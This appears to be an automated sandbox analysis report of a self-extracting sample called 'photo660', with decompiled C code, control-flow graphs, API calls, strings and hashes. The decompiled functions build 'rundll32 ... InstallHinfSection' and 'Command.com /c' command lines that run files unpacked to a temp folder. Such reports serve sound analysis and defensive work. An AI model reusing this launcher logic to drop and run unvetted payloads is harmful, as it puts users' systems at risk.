                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$photo660
                                                                                                                                                                                                        • API String ID: 1032054927-3154895515
                                                                                                                                                                                                        • Opcode ID: 6a6dbc8ecf00135808f25ead84816d9d8ccc9dfa96fcf1bf378f2ca1a593ae45
                                                                                                                                                                                                        • Instruction ID: a86babc443b2954a5ed1eed615739395cc015678b5c9ca3408e10e4acceda49f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a6dbc8ecf00135808f25ead84816d9d8ccc9dfa96fcf1bf378f2ca1a593ae45
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6B1E6705243029BD720DF24A849BEB76E6EBB5710F10492EFA89D61D0DB70C9E5CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        [Control-flow graph for function 00211AE8; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00211AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E00211680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E00211A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E00211781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        					E0021658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E00211680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E002166C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E002166C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E00211680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E00211781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E002116B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E002116B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E00212AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E0021171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E00211A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E00211A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E002144B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0x219120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x211140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0x219a34 =  *0x219a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0x219a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E0021171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0x219a34 =  *0x219a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00211680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00211680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00216CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00211d5a
                                                                                                                                                                                                        0x00211d5b
                                                                                                                                                                                                        0x00211d5d
                                                                                                                                                                                                        0x00211d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211c1b
                                                                                                                                                                                                        0x00211c1b
                                                                                                                                                                                                        0x00211c20
                                                                                                                                                                                                        0x00211c2c
                                                                                                                                                                                                        0x00211c33
                                                                                                                                                                                                        0x00211c38
                                                                                                                                                                                                        0x00211c3a
                                                                                                                                                                                                        0x00211c3a
                                                                                                                                                                                                        0x00211c40
                                                                                                                                                                                                        0x00211c4b
                                                                                                                                                                                                        0x00211c4b
                                                                                                                                                                                                        0x00211c5d
                                                                                                                                                                                                        0x00211c61
                                                                                                                                                                                                        0x00211dd4
                                                                                                                                                                                                        0x00211dd4
                                                                                                                                                                                                        0x00211dd6
                                                                                                                                                                                                        0x00211ddb
                                                                                                                                                                                                        0x00211ddc
                                                                                                                                                                                                        0x00211dde
                                                                                                                                                                                                        0x00211d64
                                                                                                                                                                                                        0x00211d64
                                                                                                                                                                                                        0x00211d67
                                                                                                                                                                                                        0x00211d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211c67
                                                                                                                                                                                                        0x00211c67
                                                                                                                                                                                                        0x00211c6d
                                                                                                                                                                                                        0x00211c72
                                                                                                                                                                                                        0x00211c74
                                                                                                                                                                                                        0x00211c74
                                                                                                                                                                                                        0x00211c8e
                                                                                                                                                                                                        0x00211c99
                                                                                                                                                                                                        0x00211cc0
                                                                                                                                                                                                        0x00211cf8
                                                                                                                                                                                                        0x00211d07
                                                                                                                                                                                                        0x00211d23
                                                                                                                                                                                                        0x00211d09
                                                                                                                                                                                                        0x00211d14
                                                                                                                                                                                                        0x00211d1b
                                                                                                                                                                                                        0x00211d1b
                                                                                                                                                                                                        0x00211d2b
                                                                                                                                                                                                        0x00211d2d
                                                                                                                                                                                                        0x00211d2d
                                                                                                                                                                                                        0x00211d38
                                                                                                                                                                                                        0x00211d39
                                                                                                                                                                                                        0x00211d46
                                                                                                                                                                                                        0x00211cc2
                                                                                                                                                                                                        0x00211cc2
                                                                                                                                                                                                        0x00211ccc
                                                                                                                                                                                                        0x00211cce
                                                                                                                                                                                                        0x00211cce
                                                                                                                                                                                                        0x00211cdb
                                                                                                                                                                                                        0x00211ce6
                                                                                                                                                                                                        0x00211cee
                                                                                                                                                                                                        0x00211cee
                                                                                                                                                                                                        0x00211e89
                                                                                                                                                                                                        0x00211e91
                                                                                                                                                                                                        0x00211e92
                                                                                                                                                                                                        0x00211e94
                                                                                                                                                                                                        0x00211e97
                                                                                                                                                                                                        0x00211ea4
                                                                                                                                                                                                        0x00211ea4
                                                                                                                                                                                                        0x00211c61
                                                                                                                                                                                                        0x00211c07
                                                                                                                                                                                                        0x00211bd3
                                                                                                                                                                                                        0x00211b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00211C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00211C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00211140,00000000,00000008,?), ref: 00211CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00211D1B
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-2145762761
                                                                                                                                                                                                        • Opcode ID: 1e5fc37246067eba6b7f3b856114301e0e0098c523325b11a2b785683a4f057b
                                                                                                                                                                                                        • Instruction ID: 94c49e9836877d480f4b98d74d06f97dd7483851da8d357ae05bf5d0dd2fa88d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5fc37246067eba6b7f3b856114301e0e0098c523325b11a2b785683a4f057b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFA15970A242196BEB209F24DC45BEA77E99F75310F1442A5E759A32C0DFB08EF5CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 212f1d-212f3d 451 212f6c-212f73 call 215164 450->451 452 212f3f-212f46 450->452 461 213041 451->461 462 212f79-212f80 call 2155a0 451->462 453 212f48 call 2151e5 452->453 454 212f5f-212f66 call 213a3f 452->454 459 212f4d-212f4f 453->459 454->451 454->461 459->461 464 212f55-212f5d 459->464 463 213043-213053 call 216ce0 461->463 462->461 469 212f86-212fbe GetSystemDirectoryA call 21658a LoadLibraryA 462->469 464->451 464->454 472 212fc0-212fd4 GetProcAddress 469->472 473 212ff7-213004 FreeLibrary 469->473 472->473 474 212fd6-212fee DecryptFileA 472->474 475 213017-213024 SetCurrentDirectoryA 473->475 476 213006-21300c 473->476 474->473 485 212ff0-212ff5 474->485 478 213054-21305a 475->478 479 213026-21303c call 2144b9 call 216285 475->479 476->475 477 21300e call 21621e 476->477 489 213013-213015 477->489 481 213065-21306c 478->481 482 21305c call 213b26 478->482 479->461 487 21307c-213089 481->487 488 21306e-213075 call 21256d 481->488 491 213061-213063 482->491 485->473 493 2130a1-2130a9 487->493 494 21308b-213091 487->494 498 21307a 488->498 489->461 489->475 491->461 491->481 496 2130b4-2130b7 493->496 497 2130ab-2130ad 493->497 494->493 499 213093 call 213ba2 494->499 496->463 497->496 501 2130af call 214169 497->501 498->487 503 213098-21309a 499->503 501->496 503->461 505 21309c 503->505 505->493
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00212F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0x218a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00215164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00216CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E002155A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E0021658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0x21a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0x218a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0x218a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0x218d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0x218d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0x219a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E0021256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0x218a24; // 0x0
                                                                                                                                                                                                        									 *0x219a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0x218a38;
                                                                                                                                                                                                        										if( *0x218a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00214169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0x219a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00213BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0x218a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00213B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E002144B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0x219124 = E00216285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0x219a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E0021621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0x218a24;
                                                                                                                                                                                                        				if( *0x218a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00213A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E002151E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0x218a38;
                                                                                                                                                                                                        				if( *0x218a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00212fcc
                                                                                                                                                                                                        0x00212fd4
                                                                                                                                                                                                        0x00212fd6
                                                                                                                                                                                                        0x00212fd8
                                                                                                                                                                                                        0x00212fe0
                                                                                                                                                                                                        0x00212fe6
                                                                                                                                                                                                        0x00212fee
                                                                                                                                                                                                        0x00212ff0
                                                                                                                                                                                                        0x00212ff5
                                                                                                                                                                                                        0x00212ff5
                                                                                                                                                                                                        0x00212fee
                                                                                                                                                                                                        0x00212fd4
                                                                                                                                                                                                        0x00212ff8
                                                                                                                                                                                                        0x00212ffe
                                                                                                                                                                                                        0x00213004
                                                                                                                                                                                                        0x00213017
                                                                                                                                                                                                        0x0021301c
                                                                                                                                                                                                        0x00213024
                                                                                                                                                                                                        0x00213054
                                                                                                                                                                                                        0x0021305a
                                                                                                                                                                                                        0x00213065
                                                                                                                                                                                                        0x00213065
                                                                                                                                                                                                        0x0021306c
                                                                                                                                                                                                        0x0021306e
                                                                                                                                                                                                        0x00213075
                                                                                                                                                                                                        0x0021307a
                                                                                                                                                                                                        0x0021307a
                                                                                                                                                                                                        0x0021307c
                                                                                                                                                                                                        0x00213081
                                                                                                                                                                                                        0x00213087
                                                                                                                                                                                                        0x00213089
                                                                                                                                                                                                        0x002130a1
                                                                                                                                                                                                        0x002130a1
                                                                                                                                                                                                        0x002130a9
                                                                                                                                                                                                        0x002130ab
